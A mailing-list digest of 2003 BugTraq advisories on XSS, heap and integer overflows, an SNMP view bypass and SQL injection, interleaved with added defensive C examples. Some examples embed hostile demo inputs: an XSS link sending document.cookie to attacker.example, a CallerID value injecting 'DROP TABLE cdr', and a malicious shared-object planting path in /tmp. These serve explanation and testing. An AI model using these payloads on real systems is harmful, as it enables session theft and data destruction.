Python Publishing Accessories Error Messages Cross-Site Scri...
BugTraq ID: 8549
Remote: Yes
Date Published: Sep 05 2003
Relevant URL: http://www.securityfocus.com/bid/8549
Summary:
Python Publishing Accessories is a library of Python modules used to build web publication systems.
A vulnerability has been reported in the error messages that Python Publishing Accessories returns to a user. The software echoes the invalid URL that was requested back in the error message without sanitizing it, so any HTML or script code embedded in that URL is rendered by the user's browser. An attacker can therefore construct a malicious link containing HTML or script code that executes in the browser of anyone who follows it, in the security context of the affected site. Successful exploitation may allow an attacker to steal cookie-based authentication credentials; other attacks may also be possible. This issue is reported in Python Publishing Accessories version 0.2.1; prior versions may be affected as well.

Apache::Gallery Insecure Local File Storage Privilege Escala...
BugTraq ID: 8561
Remote: No
Date Published: Sep 08 2003
Relevant URL: http://www.securityfocus.com/bid/8561
Summary:
Apache::Gallery is a Perl module designed to be used with Apache and mod_perl. Its purpose is to create an index of picture thumbnails for each directory hosted by the server. When initializing Inline C from within Gallery.pm, Apache::Gallery fails to store the resulting files in a secure location. Specifically, it calls File::Spec->tmpdir(), which typically returns a world-writable temporary directory, and then uses that directory to store shared objects that Apache later links in. These .so files also have predictable names, so an attacker can potentially supply malicious shared object files that will be linked into Apache.
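The temporary-directory problem described above, as an added example in C (not Apache::Gallery's code, which is Perl; the principle is the same for any process that loads shared objects from a directory it did not secure): the check a loader should make before trusting a directory, and the way to create a private directory instead of using predictable names under the shared temp directory. The names dir_is_private and make_private_dir, the gallery-XXXXXX template and the demo directory layout are this example's own.

```c
#define _DEFAULT_SOURCE          /* glibc: expose mkdtemp(), lstat() */
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

char *mkdtemp(char *tmpl);       /* POSIX prototype, in case feature macros hid it */

/* A directory may hold shared objects that a privileged process will later
 * load only if we (or root) own it and nobody else can create or rename
 * entries in it.  Group- or world-writable fails even with the sticky bit:
 * sticky stops other users deleting our files, it does not stop them creating
 * "lib/auto/Apache/Gallery_4033" before we do. */
int dir_is_private(const char *path)
{
    struct stat st;

    if (lstat(path, &st) != 0 || !S_ISDIR(st.st_mode))
        return 0;                /* missing, or a symlink/file planted in our way */
    if (st.st_uid != geteuid() && st.st_uid != 0)
        return 0;
    if (st.st_mode & (S_IWGRP | S_IWOTH))
        return 0;
    return 1;
}

/* Create a fresh mode-0700 directory with an unpredictable name below `base`.
 * mkdtemp() creates it atomically and fails if the name already exists, so an
 * attacker who can write to `base` cannot pre-create it.  On success the path
 * is written to `out` and 0 is returned. */
int make_private_dir(const char *base, char *out, size_t outlen)
{
    char tmpl[4096];
    int n = snprintf(tmpl, sizeof tmpl, "%s/gallery-XXXXXX", base);

    if (n < 0 || (size_t)n >= sizeof tmpl)
        return -1;
    if (mkdtemp(tmpl) == NULL)
        return -1;
    if (strlen(tmpl) + 1 > outlen) {
        rmdir(tmpl);
        return -1;
    }
    strcpy(out, tmpl);
    return 0;
}

/* Demonstration: the directory we just created passes the check, while a
 * world-writable subdirectory (the situation under File::Spec->tmpdir())
 * fails.  Returns 0 when both outcomes are as expected. */
int demo_private_vs_shared(void)
{
    const char *base = getenv("TMPDIR");
    char priv[4096], shared[4096];
    int priv_ok, shared_ok;

    if (base == NULL || *base == '\0')
        base = "/tmp";
    if (make_private_dir(base, priv, sizeof priv) != 0 &&
        make_private_dir(".", priv, sizeof priv) != 0)
        return -1;
    priv_ok = dir_is_private(priv);

    if (snprintf(shared, sizeof shared, "%s/shared", priv) >= (int)sizeof shared ||
        mkdir(shared, 0777) != 0 || chmod(shared, 0777) != 0) {
        rmdir(priv);
        return -1;
    }
    shared_ok = dir_is_private(shared);

    rmdir(shared);
    rmdir(priv);
    return (priv_ok == 1 && shared_ok == 0) ? 0 : 1;
}

int main(void)
{
    int r = demo_private_vs_shared();
    if (r == 0)
        printf("private directory accepted, world-writable directory rejected\n");
    else
        printf("demo failed (%d)\n", r);
    return r == 0 ? 0 : 1;
}
```

The check refuses a symlink in place of the directory as well, since lstat() does not follow it; a loader that ran stat() instead could be pointed at a directory the attacker controls.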
An attacker could exploit this issue by constructing a malicious shared object file; it may need to contain the specific functions Apache::Gallery expects in order to avoid errors. The attacker simply places the file within the /tmp/lib/auto/Apache/Gallery_4033 directory (or under whichever temporary directory is in use) before Apache creates the shared object there; the malicious file must be in place before the Apache process links to it. Malicious code is then linked into and executed within the Apache process, allowing arbitrary code execution with elevated privileges.

Net-SNMP Unauthorized MIB Object Access Vulnerability
BugTraq ID: 8582
Remote: Yes
Date Published: Sep 06 2003
Relevant URL: http://www.securityfocus.com/bid/8582
Summary:
Net-SNMP is a freely available, open source implementation of the SNMP protocol. It was previously known as UCD-SNMP and is available for Unix and Linux operating systems. Net-SNMP is prone to a vulnerability that may permit an existing user or community to gain unauthorized access to MIB objects: objects that are explicitly excluded from a user's or community's view may still be accessed. This could allow malicious parties to gain read/write access to information contained in a restricted MIB.

CmdFTP Store_Line() Heap Overflow Vulnerability
BugTraq ID: 8587
Remote: Yes
Date Published: Sep 08 2003
Relevant URL: http://www.securityfocus.com/bid/8587
Summary:
cmdftp is a command line FTP client for Linux. cmdftp has been reported prone to a remote heap overflow vulnerability. The issue is likely due to insufficient boundary checks performed by store_line() when handling FTP server directory listings.
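An added example, not cmdftp's source, of the bounded line storage that store_line() is reported to lack. The line_store structure, the MAX_LINE_LEN limit and the constructed hostile listing are this example's own assumptions; the point is that every copy is sized by a length the client itself computed and checked against a ceiling before any heap memory is written.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical cap on one listing line; real listings are a few hundred bytes. */
#define MAX_LINE_LEN 1024

struct line_store {
    char **lines;       /* one malloc'd, NUL-terminated string per stored line */
    size_t count;
    size_t cap;
    size_t rejected;    /* lines dropped for exceeding MAX_LINE_LEN */
};

/* Store one listing line.  The length comes from the caller, the destination
 * is allocated from that length, and a hard limit is enforced first, so
 * server-chosen data can never run past the heap block that receives it. */
int store_line(struct line_store *s, const char *data, size_t len)
{
    char *copy;

    if (len > MAX_LINE_LEN) {           /* the check an overflowing store_line() lacks */
        s->rejected++;
        return -1;
    }
    if (s->count == s->cap) {           /* grow the pointer table, overflow-checked */
        size_t ncap = s->cap ? s->cap * 2 : 16;
        char **tbl;
        if (ncap > SIZE_MAX / sizeof *tbl)
            return -1;
        tbl = realloc(s->lines, ncap * sizeof *tbl);
        if (tbl == NULL)
            return -1;
        s->lines = tbl;
        s->cap = ncap;
    }
    copy = malloc(len + 1);             /* len <= MAX_LINE_LEN, so this cannot wrap */
    if (copy == NULL)
        return -1;
    memcpy(copy, data, len);
    copy[len] = '\0';
    s->lines[s->count++] = copy;
    return 0;
}

/* Split bytes received on the data connection into lines (CRLF or LF) and
 * store each one.  Returns the number of lines stored. */
size_t parse_listing(struct line_store *s, const char *data, size_t len)
{
    size_t start = 0, stored = 0, i;

    for (i = 0; i < len; i++) {
        if (data[i] == '\n') {
            size_t end = i;
            if (end > start && data[end - 1] == '\r')
                end--;
            if (store_line(s, data + start, end - start) == 0)
                stored++;
            start = i + 1;
        }
    }
    if (start < len && store_line(s, data + start, len - start) == 0)
        stored++;                       /* unterminated final line */
    return stored;
}

void free_store(struct line_store *s)
{
    size_t i;
    for (i = 0; i < s->count; i++)
        free(s->lines[i]);
    free(s->lines);
    memset(s, 0, sizeof *s);
}

struct demo_result { size_t stored; size_t rejected; int first_intact; };

/* Constructed hostile listing: two ordinary lines around a 4000-byte one. */
struct demo_result demo_hostile_listing(void)
{
    static const char good1[] = "-rw-r--r--   1 ftp  ftp    42 Sep 08  2003 README";
    static const char good2[] = "drwxr-xr-x   2 ftp  ftp  4096 Sep 08  2003 pub";
    const size_t big = 4000, g1 = sizeof good1 - 1, g2 = sizeof good2 - 1;
    size_t plen = g1 + 2 + big + 2 + g2 + 2;
    char *payload = malloc(plen);
    struct line_store s = {0, 0, 0, 0};
    struct demo_result r = {0, 0, 0};

    if (payload == NULL)
        return r;
    memcpy(payload, good1, g1);
    memcpy(payload + g1, "\r\n", 2);
    memset(payload + g1 + 2, 'A', big);
    memcpy(payload + g1 + 2 + big, "\r\n", 2);
    memcpy(payload + g1 + 2 + big + 2, good2, g2);
    memcpy(payload + g1 + 2 + big + 2 + g2, "\r\n", 2);

    r.stored = parse_listing(&s, payload, plen);
    r.rejected = s.rejected;
    r.first_intact = s.count > 0 && strcmp(s.lines[0], good1) == 0;
    free_store(&s);
    free(payload);
    return r;
}
```

The oversized line is dropped and the two legitimate entries survive intact; the vulnerable pattern this replaces is a fixed-size heap buffer filled by strcat() or an unchecked loop over server bytes.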
Excessive data returned by a malicious FTP server in response to an 'ls' command may overflow a heap buffer and corrupt adjacent heap memory management structures. A remote attacker may ultimately leverage this corruption to have arbitrary supplied instructions executed in the context of the user running the vulnerable FTP client. This vulnerability has been reported to affect all versions of cmdftp prior to version 0.641.

Pine Message/External-Body Type Attribute Buffer Overflow Vu...
BugTraq ID: 8588
Remote: Yes
Date Published: Sep 10 2003
Relevant URL: http://www.securityfocus.com/bid/8588
Summary:
Pine is a freely available, open source Mail User Agent. It is distributed by the University of Washington and available for Unix, Linux and Microsoft platforms. A problem has been reported in Pine's handling of the attributes of "message/external-body" parts; because of it, an attacker may be able to gain unauthorized access to a host running the vulnerable software. The problem lies in the parsing of the attribute name/value pairs: due to improper bounds checking, a value supplied in this field can overwrite sensitive process memory. An attacker can exploit this with a custom string to execute arbitrary code with the privileges of the Pine user.

Pine rfc2231_get_param() Remote Integer Overflow Vulnerabili...
BugTraq ID: 8589
Remote: Yes
Date Published: Sep 10 2003
Relevant URL: http://www.securityfocus.com/bid/8589
Summary:
Pine is an e-mail client program used with Linux and Unix distributions. It has been reported that Pine is prone to an integer overflow condition resulting in possible memory corruption and leading to arbitrary code execution. The vulnerability exists in the rfc2231_get_param() function in the strings.c file. The condition is triggered when a vulnerable user opens a maliciously crafted e-mail message sent by a remote attacker.
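An added example, not Pine's strings.c, of the integer-overflow pattern behind this class of bug in RFC 2231 continuation handling, beside the checked arithmetic that prevents it. The two length helpers, MAX_SEGS/MAX_VALUE and the parser's simplifications (no charset/language prefix, no %XX decoding) are this example's own; the unchecked variant uses uint32_t to model the 32-bit size arithmetic of a 2003-era build.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define MAX_SEGS  64      /* hypothetical limit on continuation segments */
#define MAX_VALUE 4096    /* hypothetical cap on a reassembled parameter value */

/* Unchecked sum of segment lengths.  With sender-chosen lengths the sum
 * wraps, the allocation is then far too small, and the copy overflows it. */
uint32_t rfc2231_total_len_unchecked(const uint32_t *seglen, size_t n)
{
    uint32_t total = 1;                       /* terminating NUL */
    size_t i;
    for (i = 0; i < n; i++)
        total += seglen[i];
    return total;
}

/* Checked sum: tests "total + seglen > cap" without computing the sum, so it
 * can never wrap.  Returns 0 and stores the total, or -1 on overflow. */
int rfc2231_total_len_checked(const uint32_t *seglen, size_t n, uint32_t cap, uint32_t *out)
{
    uint32_t total = 1;
    size_t i;
    if (cap == 0)
        return -1;
    for (i = 0; i < n; i++) {
        if (seglen[i] > cap - total)
            return -1;
        total += seglen[i];
    }
    *out = total;
    return 0;
}

/* Reassemble parameter `name` from RFC 2231 continuations in a parameter list
 * such as `; charset=us-ascii; name*1="g.txt"; name*0="lon"`.  Segments may
 * arrive in any order.  Returns a malloc'd string, or NULL if the parameter
 * is absent, has a gap, or would exceed MAX_VALUE. */
char *rfc2231_get_param(const char *name, const char *params)
{
    const char *seg[MAX_SEGS] = {0};
    size_t seglen[MAX_SEGS] = {0};
    size_t nlen = strlen(name), count = 0, total = 1, off = 0, i;
    const char *p = params;
    char *out;

    while (*p != '\0') {
        const char *end, *eq;
        while (*p == ';' || *p == ' ' || *p == '\t')
            p++;
        end = strchr(p, ';');
        if (end == NULL)
            end = p + strlen(p);
        eq = memchr(p, '=', (size_t)(end - p));
        if (eq != NULL && (size_t)(eq - p) > nlen + 1 &&
            strncmp(p, name, nlen) == 0 && p[nlen] == '*') {
            char *stop;
            unsigned long idx = strtoul(p + nlen + 1, &stop, 10);
            int key_ok = stop > p + nlen + 1 &&              /* at least one digit */
                         (stop == eq || (stop + 1 == eq && *stop == '*'));
            if (key_ok && idx < MAX_SEGS) {
                const char *v = eq + 1;
                size_t vlen = (size_t)(end - v);
                if (vlen >= 2 && v[0] == '"' && v[vlen - 1] == '"') {
                    v++;
                    vlen -= 2;
                }
                seg[idx] = v;
                seglen[idx] = vlen;
                if (idx + 1 > count)
                    count = idx + 1;
            }
        }
        p = end;
    }
    if (count == 0)
        return NULL;
    for (i = 0; i < count; i++) {
        if (seg[i] == NULL || seglen[i] > MAX_VALUE - total)   /* gap, or checked add fails */
            return NULL;
        total += seglen[i];
    }
    if ((out = malloc(total)) == NULL)
        return NULL;
    for (i = 0; i < count; i++) {
        memcpy(out + off, seg[i], seglen[i]);
        off += seglen[i];
    }
    out[off] = '\0';
    return out;
}

/* Demonstrations on constructed input. */
int demo_reassembles_out_of_order(void)
{
    char *v = rfc2231_get_param("name", "; charset=us-ascii; name*1=\"g.txt\"; name*0=\"lon\"");
    int ok = v != NULL && strcmp(v, "long.txt") == 0;
    free(v);
    return ok;
}

uint32_t demo_unchecked_total_wraps(void)
{
    const uint32_t hostile[] = { 0x80000000u, 0x80000000u };   /* 2 GiB + 2 GiB */
    return rfc2231_total_len_unchecked(hostile, 2);           /* 1 + 2^32 wraps to 1 */
}

int demo_checked_total_refuses(void)
{
    const uint32_t hostile[] = { 0x80000000u, 0x80000000u };
    uint32_t total;
    return rfc2231_total_len_checked(hostile, 2, 0xFFFFFFFFu, &total);   /* -1 */
}
```

The cap matters as much as the overflow check: even without wrap-around, a sum that is merely huge lets one message force a multi-gigabyte allocation.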
The vulnerability exists because the software performs insufficient bounds checking when parsing e-mail message headers. Because memory can be corrupted, an attacker may be able to execute arbitrary code in the security context of the vulnerable version of Pine and thereby gain unauthorized access to a vulnerable host.

MySQL Password Handler Buffer Overflow Vulnerability
BugTraq ID: 8590
Remote: Yes
Date Published: Sep 10 2003
Relevant URL: http://www.securityfocus.com/bid/8590
Summary:
MySQL is an open source relational database project. It is available for the Microsoft Windows, Linux and Unix operating systems. MySQL server has been reported prone to a buffer overflow vulnerability when handling user passwords of excessive size. The issue arises from a lack of sufficient bounds checking on MySQL user passwords stored in the 'Password' field of the 'User' table: a password longer than 16 characters may overrun the bounds of a fixed-size buffer in memory and corrupt adjacent memory. The overflow occurs while acl_init() fills in an ACL_USER structure, and may ultimately result in the corruption of a saved instruction pointer. An attacker with global administrative privileges on an affected MySQL server may potentially exploit this condition to have arbitrary supplied instructions executed in the context of the MySQL server. This vulnerability has been reported to affect all versions of MySQL up to and including 4.0.14 and 3.23.57.

Asterisk CallerID Call Detail Records SQL Injection Vulnerab...
BugTraq ID: 8599
Remote: Yes
Date Published: Sep 11 2003
Relevant URL: http://www.securityfocus.com/bid/8599
Summary:
Asterisk is a software-based PBX system, available for Linux operating systems.
Asterisk supports various protocols including SIP, IAX v1 and v2, and H.323, and can be backed by a relational database. Call Detail Records (CDR) are used by telephone systems to record various data about each call, including the CallerID. Asterisk is prone to SQL injection via malformed CDR data: CallerID data supplied by the caller is not sufficiently sanitized before being written to the CDR database, which could allow SQL commands to be executed against the database backing Asterisk. An attacker could potentially use this to alter the logic of SQL queries or to exploit vulnerabilities in the underlying database; other attacks may also be possible. To exploit this issue the attacker must be able to control the CallerID data sent out by their phone system.

_______________________________________________
gull-annonces mailing list
[EMAIL PROTECTED]
http://lists.alphanet.ch/mailman/listinfo/gull-annonces
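The reflected-URL problem in the Python Publishing Accessories advisory (BID 8549) above, as an added example in C (the library itself is Python; the fix is the same in any language): an error page that pastes the request URI in verbatim beside one that escapes it first. html_escape, the page template and the hostile URI are this example's own, not the library's code.

```c
#include <stdio.h>
#include <string.h>

/* Escape the five characters that can break out of HTML text or an attribute
 * value.  Returns 0, or -1 if `out` is too small (no partial page is emitted). */
int html_escape(const char *in, char *out, size_t outlen)
{
    size_t o = 0;
    if (outlen == 0)
        return -1;
    for (; *in; in++) {
        char one[2] = { *in, '\0' };
        const char *rep;
        size_t rlen;
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        rlen = strlen(rep);
        if (rlen >= outlen - o)               /* keep room for the NUL */
            return -1;
        memcpy(out + o, rep, rlen);
        o += rlen;
    }
    out[o] = '\0';
    return 0;
}

#define NOT_FOUND_FMT "<html><body><h1>Not Found</h1>" \
                      "<p>The requested URL %s was not found on this server.</p></body></html>"

/* Vulnerable pattern: the request URI is pasted into the page verbatim. */
int not_found_page_unsafe(const char *request_uri, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, NOT_FOUND_FMT, request_uri);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Fixed pattern: escape first, so the URI can only ever render as text. */
int not_found_page_safe(const char *request_uri, char *out, size_t outlen)
{
    char esc[2048];
    int n;
    if (html_escape(request_uri, esc, sizeof esc) != 0)
        return -1;
    n = snprintf(out, outlen, NOT_FOUND_FMT, esc);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Constructed hostile request: a link like this is what the advisory's
 * attacker would send to a victim. */
static const char hostile_uri[] =
    "/articles/<script>document.location='http://attacker.example/c?'+document.cookie</script>";

int demo_unsafe_page_contains_script(void)
{
    char page[4096];
    return not_found_page_unsafe(hostile_uri, page, sizeof page) == 0 &&
           strstr(page, "<script>") != NULL;               /* 1: script tag survives */
}

int demo_safe_page_neutralises_script(void)
{
    char page[4096];
    return not_found_page_safe(hostile_uri, page, sizeof page) == 0 &&
           strstr(page, "<script>") == NULL &&
           strstr(page, "&lt;script&gt;") != NULL;         /* 1: rendered as text */
}
```

Escaping at the point of output, rather than filtering the input, is what makes the fix complete: the same URI is also logged and compared as a plain string, and only the HTML context needs the transformation.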
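The view-restriction failure in the Net-SNMP advisory (BID 8582) above, as an added example in C that is not Net-SNMP's code: the VACM view-tree lookup as RFC 3415 specifies it (the longest matching subtree decides; family masks omitted), beside a first-match variant showing one way an explicitly excluded subtree can remain reachable. The first-match variant illustrates the failure mode only; the advisory does not say how Net-SNMP's bug arose. The table, view name and OIDs are constructed.

```c
#include <stddef.h>
#include <string.h>

#define MAX_OID 16

enum view_type { VIEW_INCLUDED = 1, VIEW_EXCLUDED = 2 };

/* One row of the VACM view tree family table (RFC 3415), mask omitted. */
struct view_entry {
    const char *view;                 /* vacmViewTreeFamilyViewName */
    unsigned long subtree[MAX_OID];   /* vacmViewTreeFamilySubtree */
    size_t len;
    enum view_type type;              /* vacmViewTreeFamilyType */
};

static int subtree_matches(const struct view_entry *e, const unsigned long *oid, size_t oidlen)
{
    return e->len <= oidlen && memcmp(e->subtree, oid, e->len * sizeof oid[0]) == 0;
}

/* Correct rule: among all entries of the view whose subtree is a prefix of the
 * OID, the longest one decides.  Without masks, two matching entries of equal
 * length are the same subtree, so longest-prefix is unambiguous.  An OID that
 * matches no entry is not in the view. */
int view_allows(const struct view_entry *tbl, size_t n, const char *view,
                const unsigned long *oid, size_t oidlen)
{
    size_t i, best_len = 0;
    int best = VIEW_EXCLUDED, found = 0;

    for (i = 0; i < n; i++) {
        if (strcmp(tbl[i].view, view) != 0 || !subtree_matches(&tbl[i], oid, oidlen))
            continue;
        if (!found || tbl[i].len > best_len) {
            best_len = tbl[i].len;
            best = tbl[i].type;
            found = 1;
        }
    }
    return found && best == VIEW_INCLUDED;
}

/* Flawed rule, included only to show the failure mode: the first matching
 * entry decides.  With the usual table order (broad include first, narrower
 * exclude after it) the excluded subtree stays reachable. */
int view_allows_first_match(const struct view_entry *tbl, size_t n, const char *view,
                            const unsigned long *oid, size_t oidlen)
{
    size_t i;
    for (i = 0; i < n; i++)
        if (strcmp(tbl[i].view, view) == 0 && subtree_matches(&tbl[i], oid, oidlen))
            return tbl[i].type == VIEW_INCLUDED;
    return 0;
}

/* Constructed table: view "limited" includes mib-2 (1.3.6.1.2.1) but excludes
 * the host resources group (1.3.6.1.2.1.25). */
static const struct view_entry demo_table[] = {
    { "limited", { 1, 3, 6, 1, 2, 1 },     6, VIEW_INCLUDED },
    { "limited", { 1, 3, 6, 1, 2, 1, 25 }, 7, VIEW_EXCLUDED },
};
#define DEMO_N (sizeof demo_table / sizeof demo_table[0])

static const unsigned long sysDescr0[]   = { 1, 3, 6, 1, 2, 1, 1, 1, 0 };      /* sysDescr.0 */
static const unsigned long hrUptime0[]   = { 1, 3, 6, 1, 2, 1, 25, 1, 1, 0 };  /* hrSystemUptime.0 */
static const unsigned long enterprises[] = { 1, 3, 6, 1, 4, 1 };

int demo_sysdescr_allowed(void)
{
    return view_allows(demo_table, DEMO_N, "limited", sysDescr0, 9);          /* 1 */
}

int demo_host_resources_denied(void)
{
    return view_allows(demo_table, DEMO_N, "limited", hrUptime0, 10);         /* 0 */
}

int demo_host_resources_leak_with_first_match(void)
{
    return view_allows_first_match(demo_table, DEMO_N, "limited", hrUptime0, 10);  /* 1 */
}

int demo_enterprises_denied(void)
{
    return view_allows(demo_table, DEMO_N, "limited", enterprises, 6);        /* 0 */
}
```

A useful regression check against any agent is the same pair of queries: one object inside the included tree must answer, and one object under an excluded child of that tree must return noSuchObject or an authorization error for the same community.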
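The CallerID injection in the Asterisk advisory (BID 8599) above, as an added example that is not Asterisk's CDR code: an INSERT built by string concatenation beside one whose values are escaped the way mysql_real_escape_string() does, plus a small checker that counts semicolons outside quoted literals to show that the hostile CallerID splits the first statement but stays inside a literal in the second. The table layout, column names and CallerID values are constructed.

```c
#include <stdio.h>
#include <string.h>

/* Escape a value for use inside a single-quoted MySQL string literal, the way
 * mysql_real_escape_string() does for the characters a C string can carry:
 * a backslash before \ ' " CR and LF.  Returns 0, or -1 if `out` is too small. */
int sql_escape(const char *in, char *out, size_t outlen)
{
    size_t o = 0;
    if (outlen == 0)
        return -1;
    for (; *in; in++) {
        char esc = 0;
        switch (*in) {
        case '\\': esc = '\\'; break;
        case '\'': esc = '\''; break;
        case '"':  esc = '"';  break;
        case '\n': esc = 'n';  break;
        case '\r': esc = 'r';  break;
        default:   break;
        }
        if ((esc ? 2u : 1u) >= outlen - o)    /* keep room for the NUL */
            return -1;
        if (esc) {
            out[o++] = '\\';
            out[o++] = esc;
        } else {
            out[o++] = *in;
        }
    }
    out[o] = '\0';
    return 0;
}

#define CDR_FMT "INSERT INTO cdr (clid, dst, duration) VALUES ('%s', '%s', %d)"

/* Vulnerable pattern: the CallerID goes into the statement verbatim. */
int cdr_insert_unsafe(const char *clid, const char *dst, int duration, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, CDR_FMT, clid, dst, duration);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Fixed pattern: every string value is escaped before it reaches the
 * statement.  Prepared statements with bound parameters are better still
 * where the client library offers them, since no escaping step can be missed. */
int cdr_insert_escaped(const char *clid, const char *dst, int duration, char *out, size_t outlen)
{
    char eclid[512], edst[512];
    int n;
    if (sql_escape(clid, eclid, sizeof eclid) != 0 || sql_escape(dst, edst, sizeof edst) != 0)
        return -1;
    n = snprintf(out, outlen, CDR_FMT, eclid, edst, duration);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Count semicolons outside single-quoted literals, honouring backslash escapes
 * inside them.  A single well-formed INSERT has none; a value that closed the
 * quote and started new statements shows up here. */
int count_top_level_semicolons(const char *sql)
{
    int in_str = 0, n = 0;
    for (; *sql; sql++) {
        if (in_str) {
            if (*sql == '\\' && sql[1] != '\0')
                sql++;                        /* skip the escaped character */
            else if (*sql == '\'')
                in_str = 0;
        } else if (*sql == '\'') {
            in_str = 1;
        } else if (*sql == ';') {
            n++;
        }
    }
    return n;
}

/* Constructed CallerID values: one hostile, one legitimate with an apostrophe. */
static const char hostile_clid[] = "x', ''); DROP TABLE cdr; -- ";
static const char benign_clid[]  = "\"Alice O'Brien\" <100>";

int demo_unsafe_semicolons(void)
{
    char sql[1024];
    if (cdr_insert_unsafe(hostile_clid, "200", 42, sql, sizeof sql) != 0)
        return -1;
    return count_top_level_semicolons(sql);   /* 2: the injected statements */
}

int demo_escaped_semicolons(void)
{
    char sql[1024];
    if (cdr_insert_escaped(hostile_clid, "200", 42, sql, sizeof sql) != 0)
        return -1;
    return count_top_level_semicolons(sql);   /* 0: everything stayed inside the literal */
}

int demo_escaped_keeps_apostrophe(void)
{
    char sql[1024];
    if (cdr_insert_escaped(benign_clid, "200", 42, sql, sizeof sql) != 0)
        return -1;
    return strstr(sql, "O\\'Brien") != NULL;  /* 1: legitimate names are preserved */
}
```

The benign case is the one that catches naive fixes: stripping apostrophes from CallerID would corrupt real names, whereas escaping (or binding) keeps the value and removes only its power to end the literal.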
